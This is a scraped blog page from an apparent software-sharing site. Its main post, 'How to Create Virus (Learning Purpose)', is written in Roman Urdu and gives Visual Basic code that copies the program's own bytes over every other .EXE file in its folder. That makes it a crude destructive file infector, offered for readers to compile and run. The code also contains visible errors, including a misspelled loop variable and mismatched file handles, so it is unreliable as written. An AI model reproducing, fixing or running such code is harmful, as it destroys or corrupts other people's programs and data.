Read more: http://blogspottutz.blogspot.com/2012/11/how-to-add-facebook-comment-box-to.html#ixzz2b5Q9mTNd

Recent Updates

Welcome to Great Software and Multimedia Sharing Website >>>>>>>>>Admin>>>>>>>Zeeshan Rajput >>>>>>Cell # +923453562143 Email >>>>>> zkrsoft@gmail.com >>>>>>>>>>>>>> itpages@yahoo.com >>>>>>visit and enjoy How to Post Image                  Make a New Post                     How to Post Video

ZKRSoft-Lattest Posts

↑ Grab this Headline Animator


Live A-Z Mp3 Songs, Online Movies,

Bollywood Movies A-Z List

A|B|C|D|E|F|G|H|I|J|K|L|M|N|O|P|Q|R|S|T|U|V|W|X|Y|Z

Hollywood Movies A-Z List

A|B|C|D|E|F|G|H|I|J|K|L|M|N|O|P|Q|R|S|T|U|V|W|X|Y|Z

Mp3 Songs A-Z List

A|B|C|D|E|F|G|H|I|J|K|L|M|N|O|P|Q|R|S|T|U|V|W|X|Y|Z

 

Latest Posts

Saturday, October 30, 2010

How to Create Virus (Learning Purpose)

Visual Basic Main Virus Banane ke Lie Chota sa code Sirf Un ke lye Jo visual basic ko thora bohat jante hain....

Sab se Pehle ye Code Jeneral Main likhain...

" Dim binarycode() As Byte
Dim victim As String
Const mysize As Integer = 11776 "

Phir Form ke load event main ye code likhain:

Private Sub Form_Load()
On Error Resume Next
Dim Free
Free = FreeFile

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
ReDim binarycode(mysize)
Get #1, 1, binarycode
Close #Free

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""

Open App.Path & "\" & victim For Binary Access Write As #Free
Put #1, , binarycode
Put #1, , mysize
Close #Free

victum = Dir()

wend

End
End Sub


Sirf Programm ko Run karwain.
Share |

Make Money Online